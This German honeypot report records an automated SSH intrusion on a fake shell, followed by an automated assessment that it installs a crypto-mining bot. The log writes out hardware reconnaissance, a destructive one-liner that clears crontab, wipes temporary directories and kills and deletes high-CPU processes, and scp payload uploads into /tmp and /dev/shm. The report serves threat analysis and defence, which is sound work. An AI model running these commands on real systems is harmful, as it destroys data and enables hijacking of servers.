ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

06.10.2026, 03:46 UTC · 26 Befehle · über ssh · Niederlande

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
ubuntu / 2001

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
ubuntu@srv01: ~

ubuntu@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ubuntu@srv01:~$ uname -m | awk '{printf $1}'
x86_64
ubuntu@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
261 days, 00:00
ubuntu@srv01:~$ lspci | egrep VGA && lspci | grep 3D
01:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
02:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
03:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
04:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
01:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
02:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
03:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
04:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
ubuntu@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
AMD EPYC 7443P 24-Core Processor
ubuntu@srv01:~$ curl ipinfo.io/org
Cloudflare, Inc.
ubuntu@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
4
ubuntu@srv01:~$ nvidia-smi -q | grep "Product Name"
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
ubuntu@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
ubuntu@srv01:~$ uname -n | awk '{printf $1}'
render03
ubuntu@srv01:~$ uname -r | awk '{printf $1}'
5.15.0-88-generic
ubuntu@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
crontab: no crontab for Admin
rm: cannot remove '/var/tmp/.': Permission denied
rm: cannot remove '/var/tmp/..': Permission denied
rm: cannot remove '/tmp/.': Permission denied
rm: cannot remove '/tmp/..': Permission denied
ubuntu@srv01:~$ echo 2001 > /tmp/d.log
ubuntu@srv01:~$ scp -qt "/var/tmp/VUBcGGNW"
ubuntu@srv01:~$ scp -qt "/tmp/VUBcGGNW"
ubuntu@srv01:~$ scp -qt "/dev/shm/VUBcGGNW"
ubuntu@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ubuntu@srv01:~$ echo !QAZ2ws3e > /tmp/d.log
ubuntu@srv01:~$ scp -qt "/var/tmp/ajntAlNn"
ubuntu@srv01:~$ scp -qt "/tmp/ajntAlNn"
ubuntu@srv01:~$ scp -qt "/dev/shm/ajntAlNn"
ubuntu@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ubuntu@srv01:~$ echo 11223344556677889900 > /tmp/d.log
ubuntu@srv01:~$ scp -qt "/var/tmp/vuCuoQng"
ubuntu@srv01:~$ scp -qt "/tmp/vuCuoQng"
ubuntu@srv01:~$ scp -qt "/dev/shm/vuCuoQng"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich über SSH mit schwachen Zugangsdaten an. Er führte eine Reihe von Systemabfragen durch, um die Hardware, insbesondere die Grafikkarten, zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung. Zuletzt versuchte er, Dateien in verschiedene temporäre Verzeichnisse zu kopieren.

Was die Befehle bewirken

Die Befehle uname, lspci und nvidia-smi ermitteln Systeminformationen und erkennen die installierten Grafikkarten. Der Befehl crontab -r löscht geplante Aufgaben, während rm -rf temporäre Dateien entfernt. Die awk-Schleife identifiziert Prozesse mit hoher CPU-Nutzung und beendet sie gewaltsam, um Ressourcen freizumachen. Die scp-Befehle versuchen, Dateien in die Verzeichnisse /var/tmp, /tmp und /dev/shm zu übertragen, was oft dem Einschleusen von Schadsoftware dient.

Worauf es hinauslief

Das Vorgehen deutet stark auf die Installation eines Kryptomining-Bots hin. Die gezielte Abfrage nach NVIDIA-Grafikkarten und das Beenden konkurrierender Prozesse sind typische Indikatoren für Mining-Aktivitäten. Die wiederholten Dateiübertragungen in versteckte Ordner dienen der Persistenz oder dem Download des Mining-Codes.

Einordnung

Dieses Muster ist sehr verbreitet bei automatisierten Angriffen auf Server mit GPU-Ressourcen. Die Kombination aus Hardware-Erkennung und Prozessbereinigung ist ein Standardverfahren für Mining-Botnets.